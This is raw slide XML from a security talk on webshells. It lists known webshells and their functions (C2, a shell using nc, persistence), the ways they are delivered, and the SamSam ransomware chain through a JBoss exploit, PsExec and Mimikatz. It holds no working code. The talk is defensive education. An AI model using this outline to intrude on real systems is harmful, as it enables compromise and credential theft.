        <p:nvPicPr>
          <p:cNvPr id="115" name="Shape 115" descr="Weevely.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1017725"/>
            <a:ext cx="4230600" cy="3820975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="116" name="Shape 116" descr="B374K.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4383000" y="1043450"/>
            <a:ext cx="4673299" cy="3769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Webshells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>owerful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>eapons</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="122" name="Shape 122" descr="Screen Shot 2017-03-23 at 10.49.30 PM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1309787" y="1064575"/>
            <a:ext cx="6524417" cy="3820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Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>xamples </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ebshells</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 128"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" numCol="2" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>C99, C100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>R57</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>PhpJackal (evades AV)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Soldier of Allah (Al-qaeda webshell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Weevely (Terminal like webshell, very effective, small footprint)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>AspxSpy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>WSO (Web Shell by Orb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>China Chopper (Has thick client)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>JspWebshell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>rootshell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Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>unctions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Webshells</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Shape 13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dirty="0" smtClean="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Remote administration / C2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>File management (View, Copy, Move, Upload, Download)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Database management/connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Command Shell (ls, pwd, nc, cat, etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Entrenchment (create persistence via new mechanisms like NC, Python,Perl)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Encoding/Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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Webshells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>rovide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>urther </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ccess </a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Shape 14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dirty="0"/>
              <a:t>Many times attacker will place webshell then proceed to further access. Some common next steps are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>	- Stealing credentials </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>	- Capturing traffic (Stats, behavior, protocols, etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>	- Footprinting internal network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>	- Local root/system exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="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How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>re </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>hese </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ebshells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>elivered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 14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400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Web shells can be delivered through a number of web application exploits or configuration weaknesses including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="787400" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Cross-Site Scripting;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="787400" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>SQL Injection;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="787400" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Vulnerabilities in applications/services  (e.g., WordPress or other CMS applications);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="787400" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>File processing vulnerabilities (e.g., upload filtering or assigned permissions);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="787400" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Remote File Include (RFI) and Local File Include (LFI) vulnerabilities;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="787400" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Exposed Admin Interfaces (possible areas to find vulnerabilities mentioned above). *US Cert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>xploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ampaign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>sing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ebshell</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 15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dirty="0"/>
              <a:t>Delivery of SamSam ransomware (2016)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>JBOSS vulnerability (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>CVE-2010-0738/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1350" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CVE-2013-4810</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>at exposed web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Upload webshell ( jbossinvoker, zecmd, cmd, etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>JBoss running high on privs? No problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>JBoss with low privs, upload local root/system exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> Windows box? upload PSexec (Powershell now works on *nix as well)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Distribute ransomware (SamSam), Run MimiKatz? (PTH,PTT)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="153" name="Shape 153" descr="Screen Shot 2017-03-24 at 8.58.18 AM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825986" y="2099327"/>
            <a:ext cx="2674025" cy="1362650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solid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For Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15684037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$Whoami</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Shape 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sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Rod Soto has over 15 years of experience in information technology and security. He is a security researcher and secretary of the board of Hackmiami %27.He has spoken at ISSA, ISC2, OWASP, DEFCON, BlackHat, RSA,  Hackmiami, Bsides and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the 2012 BlackHat Las vegas CTF competition and is the founder and lead developer of the Kommand &amp;&amp; KonTroll competitive hacking Tournament series. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Joseph Zadeh studied mathematics in college and received a BS from University California, Riverside and an MS and PhD from Purdue University. While in college, he worked in a Network Operation Center focused on security and network performance baselines and during that time he spoke at DEFCON and Torcon security conferences. Most recently he joined Caspida as a security data scientist. Previously, Joseph was part of the data science consulting team at Greenplum/Pivotal helping focused on Cyber Security analytics and also part of Kaiser Permanentes first Cyber Security R&amp;D team. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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Layered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>ML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
